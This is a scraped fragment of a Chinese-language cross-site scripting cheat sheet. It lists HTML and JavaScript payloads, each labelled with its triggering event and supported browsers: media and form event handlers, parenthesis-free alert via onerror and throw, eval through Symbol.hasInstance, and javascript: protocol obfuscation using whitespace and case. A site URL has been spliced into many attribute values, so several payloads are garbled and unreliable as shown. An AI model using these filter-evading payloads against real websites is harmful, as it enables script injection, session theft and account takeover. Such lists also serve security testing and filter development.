需要点击元素才能暂停(Chrome、Firefox、IE、Safari)
<audio autoplay controls onpause=alert(1)><source src="http://www.likecs.com/validaudio.wav" type="audio/wav"></audio>需要点击(Chrome、Firefox、IE、Safari)
<form onreset=alert(1)><input type=reset>提交表单并且输入具有搜索的type属性时触发(Chrome)
<form><input type=search onsearch=alert(1) value=http://www.likecs.com/"Hit return" autofocus>需要点击元素时间轴(Chrome、Firefox、IE、Safari)
<audio autoplay controls onseeked=alert(1)><source src="http://www.likecs.com/validaudio.wav" type="audio/wav"></audio>需要点击元素时间轴(Chrome、Firefox、IE、Safari)
<audio autoplay controls onseeking=alert(1)><source src="http://www.likecs.com/validaudio.wav" type="audio/wav"></audio>需要选择文字(Chrome、Firefox、IE、Safari)
<input onselect=alert(1) value=http://www.likecs.com/"XSS" autofocus>需要提交表单(Chrome、Firefox、IE、Safari)
<form onsubmit=alert(1)><input type=submit>需要在页面上的任意位置单击并重新加载(Chrome)
<svg onunload=window.open('javascript:alert(1)')>需要调节音量(Chrome、Firefox、IE、Safari)
<audio autoplay controls onvolumechange=alert(1)><source src="http://www.likecs.com/validaudio.wav" type="audio/wav"></audio>使用鼠标滚轮时触发(Chrome、Firefox、IE、Safari)
<body onwheel=alert(1)> 限制字符无括号,使用异常处理
<script>onerror=alert;throw 1</script>无括号,无分号,使用异常处理
<script>{onerror=alert}throw 1</script>无括号的异常处理,没有使用表达式的半冒号
<script>throw onerror=alert,1</script>无括号异常处理和evil
<script>throw onerror=eval,'=alert\x281\x29'</script>无括号,在Firefox上使用异常处理和evil
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>无括号,使用ES6 hasInstance和instanceof与eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>无括号,使用ES6的hasInstance和instanceof以及eval
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>无括号,使用位置重定向
<script>location='javascript:alert\x281\x29'</script>无字符串,使用位置没有括号重定向
<script>location=name</script>无括号,使用模板字符串
<script>alert`1`</script> 前端框架Bootstrap onanimationstart事件
<xss onanimationstart=alert(1)>Bootstrap ontransitionend事件
<xss data-ride=carousel data-interval=http://www.likecs.com/100 ontransitionend=alert(1)><xss><xss></xss><xss></xss></xss></xss> 通讯协议iframe src属性JavaScript协议
<iframe src=http://www.likecs.com/"javascript:alert(1)">具有JavaScript协议的对象data属性
<object data=http://www.likecs.com/"javascript:alert(1)">使用JavaScript协议嵌入src属性
<embed src=http://www.likecs.com/"javascript:alert(1)">标准的JavaScript协议
<a href="javascript:alert(1)">XSS</a>不区分大小写的协议
<a href="http://www.likecs.com/JaVaScript:alert(1)">XSS</a>协议之前允许使用字符\x01- \x20
<a href=" javascript:alert(1)">XSS</a>协议中允许使用字符\ x09,\x0a,\x0d
<a href="javas cript:alert(1)">XSS</a>协议名称后在冒号前允许字符\x09,\x0a,\x0d
<a href="javas cript:alert(1)">XSS</a>带有JavaScript协议的SVG中的Xlink命名空间
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>